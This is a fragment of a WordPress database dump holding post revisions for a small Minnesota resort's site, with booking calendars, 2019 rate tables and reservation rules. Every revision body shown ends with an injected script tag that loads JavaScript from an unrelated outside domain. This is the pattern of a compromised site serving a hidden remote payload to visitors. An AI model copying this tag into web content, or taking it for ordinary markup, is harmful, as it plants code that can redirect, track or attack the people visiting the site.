4\",\"4\",\"X\",\"X\",\"\",\"\",\"\",\"X\",\"X\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"4\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"4\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 5\",\"5\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"5\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"5\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 6\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 7\",\"7\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"7\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"7\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"VILLA 9\",\"9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"9\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CABIN 10\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"10\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"10\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CABIN 11\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"11\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CABIN 12\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"12\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"12\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 13\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 14\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"14\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2019-07-15 17:06:17','2019-07-15 22:06:17','',835,'http://ashbyresort.com/835-revision-v1/',0,'revision','',0),(888,3,'2019-07-15 17:13:30','2019-07-15 22:13:30','<div id=\"pl-43\"  class=\"panel-layout\" ><div id=\"pg-43-0\"  class=\"panel-grid panel-no-style\"  data-style=\"{&quot;cell_alignment&quot;:&quot;flex-start&quot;}\"  data-ratio=\"1\"  data-ratio-direction=\"right\" ><div id=\"pgc-43-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" ><div id=\"panel-43-0-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child\" data-index=\"0\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	Call us at 218-747-2959 for reservations \n\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n</div>\n</div></div><div id=\"panel-43-0-0-1\" class=\"so-panel widget widget_sow-editor\" data-index=\"1\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	[table id=1 /]</div>\n</div></div><div id=\"panel-43-0-0-2\" class=\"so-panel widget widget_sow-editor\" data-index=\"2\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	<p>ALL Cabins and Motel rooms are NON smoking !!</p>\n<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less  All Daytime (Not Overnight) Guests $5.00 each  Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875%  ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.  PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.<br />\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION.  ALL DEPOSITS ARE NON-REFUNDABLE.</p>\n<p>A 3% PROCESSING FEE WILL BE ADDED FOR ALL CREDIT AND DEBIT CARD USAGE.</p>\n<p>CHECK IN TIME IS AFTER 3:00PM  <strong>NO</strong> EXCEPTIONS !!  CHECK OUT TIME IS BEFORE 10:00AM, <strong>NO</strong> exceptions !!<br />\nPets on a leash are welcome in all campsites ( 2 pets per campsite)  and some of the units ( 1 pet per unit where allowable).<br />\nPlease do not bring firewood, if you live more than 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND.  Call to set up reservations for Hunting and Ice fishing.</p>\n</div>\n</div></div><div id=\"panel-43-0-0-3\" class=\"so-panel widget widget_sow-editor panel-last-child\" data-index=\"3\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	[table id=2 /]</div>\n</div></div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2019-07-15 17:13:30','2019-07-15 22:13:30','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(889,3,'2019-07-21 14:39:26','2019-07-21 19:39:26','[[\"2019\",\"Bedrooms\",\"Weekday Nightly\",\"Weekend Holiday Nightly\",\"Weekly Sept. \\u2013 May\",\"Weekly June \\u2013 Aug.\",\"Maximum Capacity\"],[\"Sleepers Motel\",\"1\",\"$85.00\",\"$95.00\",\"$450.00\",\"$550.00\",\"4\\n\"],[\"Kitchenettes Motel\",\"1\",\"$100.00\",\"$130.00\",\"$600.00\",\"$700.00\",\"4\"],[\"Suite 9\",\"2\",\"$180.00\",\"$230.00\",\"$900.00\",\"$1,125.00\",\"4\"],[\"Cabins (#10 #11 #12)\",\"2\",\"$180.00\",\"$230.00\",\"$900.00\",\"$1,125.00\",\"8\"],[\"Cabins (#13 #14)\",\"2\",\"$200.00\",\"$250.00\",\"$1,000.00\",\"$1,225.00\",\"8\"],[\"Camping non-electric\",\"1 per site\",\"$35.00\",\"$35.00\",\"$180.00\",\"$180.00\",\"\"],[\"Camping with electric\",\"1\\u00a0 per site\\n\",\"$45.00\",\"$45.00\",\"$250.00\",\"$250.00\",\"\"],[\"Drive Thru sites, elec, water and sewer\",\"1 per site\",\"$60.00\",\"$60.00\",\"$300.00\",\"$300.00\",\"\"],[\"Pets (two pets per campsite)\",\"\",\"$10.00/ Pet\",\"$10.00/ Pet\",\"$50.00/ Pet\",\"$50.00/ Pet\",\"\"],[\"Pet in Cabins or Motel rooms\",\"\",\"$25.00/ Pet\",\"$25.00/ Pet\",\"$125.00/ Pet\",\"$125.00/ Pet\",\"\"],[\"Additional People Camping (Each)\",\"\",\"$5.00\",\"$5.00\",\"$25.00\\n\",\"$25.00\\n\",\"\"],[\"Additional People in Motel and Cabins (Each)\",\"\",\"$25.00\",\"$25.00\",\"$125.00\\n\",\"$125.00\\n\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','2019 Rates','Call us at 218-747-2959 for reservations  A 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.  Balance is due upon arrival.\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nAll Guests must check in upon arrival. \nWireless Internet Available','inherit','closed','closed','','679-revision-v1','','','2019-07-21 14:39:26','2019-07-21 19:39:26','',679,'http://ashbyresort.com/679-revision-v1/',0,'revision','',0),(890,3,'2019-07-21 14:42:58','2019-07-21 19:42:58','<div id=\"pl-43\"  class=\"panel-layout\" ><div id=\"pg-43-0\"  class=\"panel-grid panel-no-style\"  data-style=\"{&quot;cell_alignment&quot;:&quot;flex-start&quot;}\"  data-ratio=\"1\"  data-ratio-direction=\"right\" ><div id=\"pgc-43-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" ><div id=\"panel-43-0-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child\" data-index=\"0\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	Call us at 218-747-2959 for reservations \n\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.  BALANCE IS DUE UPON ARRIVAL.\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW.\nALL GUESTS MUST CHECK IN AT THE RESORT OFFICE UPON ARRIVAL.\n\nWireless Internet Available\n</div>\n</div></div><div id=\"panel-43-0-0-1\" class=\"so-panel widget widget_sow-editor\" data-index=\"1\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	[table id=1 /]</div>\n</div></div><div id=\"panel-43-0-0-2\" class=\"so-panel widget widget_sow-editor\" data-index=\"2\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	<p>ALL Cabins and Motel rooms are NON smoking !!</p>\n<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less  All Daytime (Not Overnight) Guests $5.00 each  Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875%  ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.  PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.<br />\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION.  ALL DEPOSITS ARE NON-REFUNDABLE.</p>\n<p>A 3% PROCESSING FEE WILL BE ADDED FOR ALL CREDIT AND DEBIT CARD USAGE.</p>\n<p>CHECK IN TIME IS AFTER 3:00PM  <strong>NO</strong> EXCEPTIONS !!  CHECK OUT TIME IS BEFORE 10:00AM, <strong>NO</strong> exceptions !!<br />\nPets on a leash are welcome in all campsites ( 2 pets per campsite)  and some of the units ( 1 pet per unit where allowable).<br />\nPlease do not bring firewood, if you live more than 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND.  Call to set up reservations for Hunting and Ice fishing.</p>\n</div>\n</div></div><div id=\"panel-43-0-0-3\" class=\"so-panel widget widget_sow-editor panel-last-child\" data-index=\"3\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	[table id=2 /]</div>\n</div></div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2019-07-21 14:42:58','2019-07-21 19:42:58','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(891,3,'2019-07-23 13:17:22','2019-07-23 18:17:22','[[\"\",\"7/27-8/2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"8/3-8/9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"8/10-8/16\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"8/17-8/23\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"8/24-8/30\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\"],[\"KITCHEN 1\",\"1\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"1\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 2\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"KITCHEN 3\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"3\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"SLEEPER 4\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"4\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"4\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 5\",\"5\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"5\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 6\",\"6\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"KITCHEN 7\",\"7\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"7\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"VILLA 9\",\"9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"9\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CABIN 10\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"X\",\"10\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"10\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 11\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"11\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"11\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"CABIN 12\",\"12\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"12\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"12\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\"],[\"CABIN 13\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\"],[\"CABIN 14\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"14\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"14\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2019-07-23 13:17:22','2019-07-23 18:17:22','',835,'http://ashbyresort.com/835-revision-v1/',0,'revision','',0),(892,3,'2019-07-26 09:11:36','2019-07-26 14:11:36','[[\"\",\"7/27-8/2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"8/3-8/9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"8/10-8/16\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"8/17-8/23\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"8/24-8/30\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\",\"\",\"S\",\"S\",\"M\",\"T\",\"W\",\"T\",\"F\"],[\"KITCHEN 1\",\"1\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"1\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"1\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 2\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"2\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"KITCHEN 3\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"3\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"3\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"SLEEPER 4\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\",\"4\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"X\",\"4\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"4\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"KITCHEN 5\",\"5\",\"X\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"5\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"5\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"SLEEPER 6\",\"6\",\"X\",\"\",\"X\",\"X\",\"X\",\"X\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\",\"6\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"KITCHEN 7\",\"7\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"7\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"VILLA 9\",\"9\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"9\",\"X\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"9\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[\"CABIN 10\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"10\",\"\",\"X\",\"X\",\"\",\"\",\"\",\"X\",\"10\",\"X\",\"X\",\"\",\"\",\"\",\"\",\"\",\"10\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"10\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\"],[\"CABIN 11\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"11\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"11\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"11\",\"\",\"\",\"\",\"\",\"\",\"\",\"X\"],[\"CABIN 12\",\"12\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"12\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"12\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\"],[\"CABIN 13\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"13\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"X\"],[\"CABIN 14\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"X\",\"14\",\"\",\"\",\"X\",\"X\",\"X\",\"\",\"\",\"14\",\"\",\"\",\"\",\"\",\"\",\"X\",\"X\",\"14\",\"X\",\"\",\"\",\"\",\"\",\"\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Booking Calendar','Booking Calendar','inherit','closed','closed','','835-revision-v1','','','2019-07-26 09:11:36','2019-07-26 14:11:36','',835,'http://ashbyresort.com/835-revision-v1/',0,'revision','',0),(893,3,'2019-08-03 06:28:04','2019-08-03 11:28:04','[[\"2019\",\"Bedrooms\",\"Weekday Nightly\",\"Weekend Holiday Nightly\",\"Weekly Sept. \\u2013 May\",\"Weekly June \\u2013 Aug.\",\"Maximum Capacity\"],[\"Sleepers Motel\",\"1\",\"$85.00\",\"$95.00\",\"$450.00\",\"$550.00\",\"4\\n\"],[\"Kitchenettes Motel\",\"1\",\"$100.00\",\"$130.00\",\"$600.00\",\"$700.00\",\"4\"],[\"Suite 9\",\"2\",\"$180.00\",\"$230.00\",\"$900.00\",\"$1,125.00\",\"4\"],[\"Cabins (#10 #11 #12)\",\"2\",\"$180.00\",\"$230.00\",\"$900.00\",\"$1,125.00\",\"8\"],[\"Cabins (#13 #14)\",\"2\",\"$200.00\",\"$250.00\",\"$1,000.00\",\"$1,225.00\",\"8\"],[\"Camping non-electric\",\"1 per site\",\"$35.00\",\"$35.00\",\"$180.00\",\"$180.00\",\"\"],[\"Camping with electric\",\"1\\u00a0 per site\\n\",\"$45.00\",\"$45.00\",\"$250.00\",\"$250.00\",\"\"],[\"Drive Thru sites, elec, water and sewer\",\"1 per site\",\"$60.00\",\"$60.00\",\"$300.00\",\"$300.00\",\"\"],[\"Pets (two pets per campsite)\",\"\",\"$10.00/ Pet\",\"$10.00/ Pet\",\"$50.00/ Pet\",\"$50.00/ Pet\",\"\"],[\"Pet in Cabins or Motel rooms\",\"\",\"$25.00/ Pet\",\"$25.00/ Pet\",\"$125.00/ Pet\",\"$125.00/ Pet\",\"\"],[\"Additional People Camping (Each)\",\"\",\"$5.00\",\"$5.00\",\"$25.00\\n\",\"$25.00\\n\",\"\"],[\"Additional People in Motel and Cabins (Each)\",\"\",\"$25.00\",\"$25.00\",\"$125.00\\n\",\"$125.00\\n\",\"\"]]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','2019 Rates','Call us at 218-747-2959 for reservations  \nNO checkins after 10:00 PM !!\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.  Balance is due upon arrival.\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\nAll Guests must check in upon arrival. \nWireless Internet Available','inherit','closed','closed','','679-revision-v1','','','2019-08-03 06:28:04','2019-08-03 11:28:04','',679,'http://ashbyresort.com/679-revision-v1/',0,'revision','',0),(894,3,'2019-08-03 06:29:59','2019-08-03 11:29:59','<div id=\"pl-43\"  class=\"panel-layout\" ><div id=\"pg-43-0\"  class=\"panel-grid panel-no-style\"  data-style=\"{&quot;cell_alignment&quot;:&quot;flex-start&quot;}\"  data-ratio=\"1\"  data-ratio-direction=\"right\" ><div id=\"pgc-43-0-0\"  class=\"panel-grid-cell\"  data-weight=\"1\" ><div id=\"panel-43-0-0-0\" class=\"so-panel widget widget_sow-editor panel-first-child\" data-index=\"0\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	Call us at 218-747-2959 for reservations \n<strong>NO checkins after 10:00 PM !!</strong>\n\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.  BALANCE IS DUE UPON ARRIVAL.\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW.\nALL GUESTS MUST CHECK IN AT THE RESORT OFFICE UPON ARRIVAL.\n\nWireless Internet Available\n</div>\n</div></div><div id=\"panel-43-0-0-1\" class=\"so-panel widget widget_sow-editor\" data-index=\"1\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><div class=\"so-widget-sow-editor so-widget-sow-editor-base\">\n<div class=\"siteorigin-widget-tinymce textwidget\">\n	[table id=1 /]</div>\n</div></div><div id=\"panel-43-0-0-2\" class=\"so-panel widget 